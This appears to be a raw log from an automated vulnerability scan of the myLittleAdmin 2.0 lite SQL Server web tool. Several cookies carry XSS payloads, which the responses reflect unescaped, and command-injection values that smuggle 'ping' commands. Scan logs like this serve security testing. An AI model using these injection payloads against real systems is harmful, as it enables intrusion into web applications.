Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

GET /mla2000/scripts/pref/default.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/display.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=MaxDisplayedChar=40&MaxDisplayedBin=16&ShowSysProcedure=False&ShowSysFunction=False&PageSize=20&ShowSysTable=False&RowDelimiter=%3B&FirstDayOfWeek=1&Theme=%27%22%2D%2D%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0005B3%29%3C%2Fscript%3E&Lng=&ShowSysDatabase=False&ShowSysView=False; ConnStr=User=%27%3E%3Cnet+sparker%3Dnetsparker%280x0004DE%29%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Trusted=3&Portnumber=3&Password=3&Initialcatalog=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=PKHDKDPDFHAAPLEPIAECFPPO
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1140


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>



<P>&nbsp;</P>
<H2>Please wait while the tree is loading...</H2>


<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";

//-->
</SCRIPT>

</BODY>
</HTML>

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:50:40 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:50:39 GMT
Content-Length: 1084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/'"--></style></script><script>netsparker(0x0005B3)</script>/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../pref/default.asp">Preferences</A></P>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=4>Preferences</TD></TR>
<TR><TD>
Choose between<BR>
<UL>
<LI><A CLASS="contentLink" HREF="theme.asp">Skin</A></LI><LI><A CLASS="contentLink" HREF="language.asp">Language</A></LI><LI><A CLASS="contentLink" HREF="display.asp">Display</A></LI>
</UL>
</TD></TR>
</TABLE>




<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M10');

//-->
</SCRIPT>

</BODY>
</HTML>

GET /mla2000/scripts/conn/dsnless.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:46:01 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:46:00 GMT
Content-Length: 1793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../conn/default.asp">Connection</A> \ <A HREF="../conn/dsnless.asp">DSN-less</A></P>

<FORM NAME="mla_conn" METHOD=POST ACTION="dsnless.asp">
<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form">
<TR><TD CLASS="caption" COLSPAN=4><IMG SRC="../../themes/classic/images/mylittletree/server.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALIGN="MIDDLE" ALT="Connection"> Connection</TD></TR>
<TR>
<TD CLASS="formlabel">Data Source :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_datasource" CLASS="alphanumeric" TITLE="Data Source"></TD>
<TD CLASS="formlabel">Port :</TD>
<TD><INPUT TYPE="text" NAME="mla_conn_portnumber" CLASS="numeric" TITLE="Port"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Initial Catalog :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_initialcatalog" CLASS="alphanumeric" TITLE="Initial Catalog"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Provider :</TD>
<TD COLSPAN=3>
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="SQLOLEDB" ID="mla_conn_provider_1" CHECKED><LABEL FOR="mla_conn_provider_1">SQLOLEDB</LABEL> &nbsp;
<INPUT TYPE="radio" NAME="mla_conn_provider" VALUE="ODBC" ID="mla_conn_provider_2"><LABEL FOR="mla_conn_provider_2">ODBC</LABEL>
</TD>
</TR>
<TR>
<TD CLASS="formlabel">Network Library :</TD>
<TD>
<SELECT NAME="mla_conn_networklibrary">
<OPTION VALUE="">Default</OPTION>
<OPTION VALUE="dbnmpntw">Named Pipes</OPTION>
<OPTION VALUE="dbmssocn">Winsock TCP/IP</OPTION>
<OPTION VALUE="dbmsspxn">SPX/IPX</OPTION>
<OPTION VALUE="dbmsvinn">Banyan Vines</OPTION>
<OPTION VALUE="dbmsrpcn">Multi-Protocol (RPC)</OPTION>
</SELECT>
</TD>
<TD CLASS="formlabel">Trusted :</TD>
<TD><INPUT TYPE="checkbox" NAME="mla_conn_trusted"></TD>
</TR>
<TR>
<TD CLASS="formlabel">User Name :</TD>
<TD COLSPAN=3><INPUT TYPE="text" NAME="mla_conn_user" CLASS="alphanumeric" TITLE="User Name"></TD>
</TR>
<TR>
<TD CLASS="formlabel">Password :</TD>
<TD COLSPAN=3><INPUT TYPE="password" NAME="mla_conn_password" CLASS="alphanumeric" TITLE="Password"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=3 CLASS="formlabel">Save this information into a cookie :</TD><TD><INPUT TYPE="checkbox" NAME="mla_conn_cookie"></TD>
</TR>
<TR><TD COLSPAN=4>&nbsp;</TD></TR>
<TR>
<TD COLSPAN=4 ALIGN=CENTER>
<INPUT TYPE="reset" VALUE="Reset" NAME="mla_conn_reset"> &nbsp;
<INPUT TYPE="submit" VALUE="Connect" NAME="mla_conn_submit">
</TD>
</TR>
</TABLE>
</FORM>

<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
document.mla_conn.mla_conn_datasource.value = "";
document.mla_conn.mla_conn_portnumber.value = "";
setRadioValue(document.mla_conn.mla_conn_provider, "", "");
setSelectValue(document.mla_conn.mla_conn_networklibrary, "", "");
document.mla_conn.mla_conn_initialcatalog.value = "";
document.mla_conn.mla_conn_trusted.checked = false;
document.mla_conn.mla_conn_user.value = "";
document.mla_conn.mla_conn_password.value = "";

if (window.parent.frames['Tree']) window.parent.frames['Tree'].oTree.expandNode('M1');
//-->
</SCRIPT>

</BODY>
</HTML>

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=%3C%2Fa+style%3Dx%3Aexpre%2F%2A%2A%2Fssion%28netsparker%280x0003E5%29%29%3E&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

GET /mla2000/scripts/hlp/connected.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/dsnless.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=False&ShowSysDatabase=False&Lng=&Theme=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=False&PageSize=20&ShowSysFunction=False&ShowSysProcedure=False&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=3&Networklibrary=3&Datasource=3&Provider=%22%26ping+%2Dc+26+127%2E0%2E0%2E1+%26%22&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=3&Dsn=3; ASPSESSIONIDQATCTSCC=GGHDKDPDJGDBNDNCELJMJFEF
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:47:02 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:47:02 GMT
Content-Length: 1632


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>

<P ALIGN=CENTER>
<IMG SRC="../../themes/mylittletools.gif" WIDTH="383" HEIGHT="50" BORDER=0 ALT="myLittleTools.net"><BR>
© 2000-2003, Elian Chrebor, <A HREF="http://www.mylittletools.net" TARGET=_blank>myLittleTools.net</A> - All rights reserved<BR>
&nbsp;<BR>
</P>


<H2>Please wait while the tree is loading...</H2>


<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption" COLSPAN=2>Information</TD></TR>
<TR><TD CLASS="formlabel">Product :</TD><TD>myLittleAdmin For SQL Server and MSDE</TD></TR>
<TR><TD CLASS="formlabel">Version :</TD><TD>2.0 lite</TD></TR>
<TR><TD CLASS="formlabel">Release :</TD><TD>096</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Navigation</TD></TR>
<TR><TD>
Use the tree on the left frame to navigate.<BR>
&nbsp;<BR>
<B>Current connection string :</B><BR>
Driver={SQL Server};Server=</a style=x:expre/**/ssion(netsparker(0x0003E5))>;Address=</a style=x:expre/**/ssion(netsparker(0x0003E5))>,3;Network =3;Database=3;Trusted_Connection=yes;Uid=3;Pwd=3;
</TD></TR>
</TABLE>
&nbsp;<BR>

<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form" WIDTH=320>
<TR><TD CLASS="caption">Quick Help</TD></TR>
<TR><TD>
<UL>
<LI><IMG SRC="../../themes/classic/images/action/new.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="New" ALIGN="MIDDLE">&nbsp; New</LI>
<LI><IMG SRC="../../themes/classic/images/action/property.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Structure" ALIGN="MIDDLE">&nbsp; Structure</LI>
<LI><IMG SRC="../../themes/classic/images/action/rename.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Rename" ALIGN="MIDDLE">&nbsp; Rename</LI>
<LI><IMG SRC="../../themes/classic/images/action/drop.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Drop" ALIGN="MIDDLE">&nbsp; Drop</LI>
<LI><IMG SRC="../../themes/classic/images/action/edit.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Edit" ALIGN="MIDDLE">&nbsp; Edit</LI>
<LI><IMG SRC="../../themes/classic/images/action/sql.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Generate SQL" ALIGN="MIDDLE">&nbsp; Generate SQL</LI>
<LI><IMG SRC="../../themes/classic/images/action/content.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Content" ALIGN="MIDDLE">&nbsp; Content</LI>
<LI><IMG SRC="../../themes/classic/images/action/search.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="Search" ALIGN="MIDDLE">&nbsp; Search</LI>
<LI><IMG SRC="../../themes/classic/images/action/xml.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="XML Export" ALIGN="MIDDLE">&nbsp; Export as XML</LI>
<LI><IMG SRC="../../themes/classic/images/action/csv.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALT="CSV Export" ALIGN="MIDDLE">&nbsp; Export as CSV</LI>
</UL>
</TD></TR>
</TABLE>



<H2>Please wait while the tree is loading...</H2>
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
<!--
if (window.parent.frames['Tree']) window.parent.frames['Tree'].document.location = "../inc/tree_con.asp";
-->
</SCRIPT>


</BODY>
</HTML>

GET /mla2000/scripts/pref/default.asp?refresh=1 HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/pref/display.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: Option=ShowSysView=True&ShowSysDatabase=True&Lng=&FirstDayOfWeek=1&RowDelimiter=%3B&ShowSysTable=True&PageSize=%22%26+ping+%2Dn+26+127%2E0%2E0%2E1+%26&ShowSysFunction=True&ShowSysProcedure=True&MaxDisplayedBin=16&MaxDisplayedChar=40; ConnStr=User=%3Cscript%3Ens%280x00069C%29%3C%2Fscript%3E&Networklibrary=3&Datasource=3&Provider=ODBC&Password=3&Initialcatalog=3&Trusted=3&Portnumber=3; ConnStrDsn=Level=&Password=3&User=%27%2BNSFTW%2B%27&Dsn=3; ASPSESSIONIDQATCTSCC=IMHDKDPDAIEBEAIHJBDAFMOG
Accept-Encoding: gzip, deflate

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:53:08 GMT
Content-Length: 1208


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>

GET /mla2000/scripts/conn/dsnless.asp HTTP/1.1
Referer: http://vulnerable.mylittleadmin.v2.lite.r096.host:8401/mla2000/scripts/conn/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: vulnerable.mylittleadmin.v2.lite.r096.host:8401
Cookie: ASPSESSIONIDQATCTSCC=DCHDKDPDFNKIEINKNMKFBOPO
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate,private
Pragma: no-cache
Content-Type: text/html; Charset=iso-8859-1
Content-Encoding:
Expires: Tue, 24 Sep 1991 02:00:00 GMT
Last-Modified: 5/21/2011 11:46:01 AM
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 21 May 2011 16:46:00 GMT
Content-Length: 1793


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META HTTP-EQUIV="Content-Language" CONTENT="en-FX">
<TITLE>myLittleTools.net :: myLittleAdmin (for SQL Server and MSDE) v.2.0 lite r.096</TITLE>
<META NAME="description" CONTENT="myLittleTools.net is a leading provider of web-based applications and components for ASP developers.">
<META NAME="author" CONTENT="Elian Chrebor">
<META NAME="reply-to" CONTENT="webmaster@myLittleTools.net">
<META NAME="owner" CONTENT="webmaster@myLittleTools.net">
<META NAME="copyright" CONTENT="(c) 2000-2003, Elian Chrebor, myLittleTools.net">
<LINK REV=made HREF="mailto:webmaster@myLittleTools.net">
<META NAME="ROBOTS" CONTENT="noindex, nofollow">
<LINK REL="stylesheet" HREF="../../themes/classic/css/mla_sql.css" TYPE="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript" SRC="../js/mla_sql.js"></SCRIPT>
</HEAD>
<BODY>
<P CLASS="treeinfo"><A HREF="../hlp/default.asp">myLittleAdmin</A> \ <A HREF="../conn/default.asp">Connection</A> \ <A HREF="../conn/dsnless.asp">DSN-less</A></P>

<FORM NAME="mla_conn" METHOD=POST ACTION="dsnless.asp">
<TABLE BORDER=0 CELLPADDING=2 CELLSPACING=0 CLASS="hcontent" SUMMARY="Connection Form">
<TR><TD CLASS="caption" COLSPAN=4><IMG SRC="../../themes/classic/images/mylittletree/server.gif" WIDTH="16" HEIGHT="16" BORDER=0 ALIGN="MIDDLE" ALT="Connection"> Connection</TD></TR>
<TR>
<TD CLASS="formlabel">Data Source :</TD>
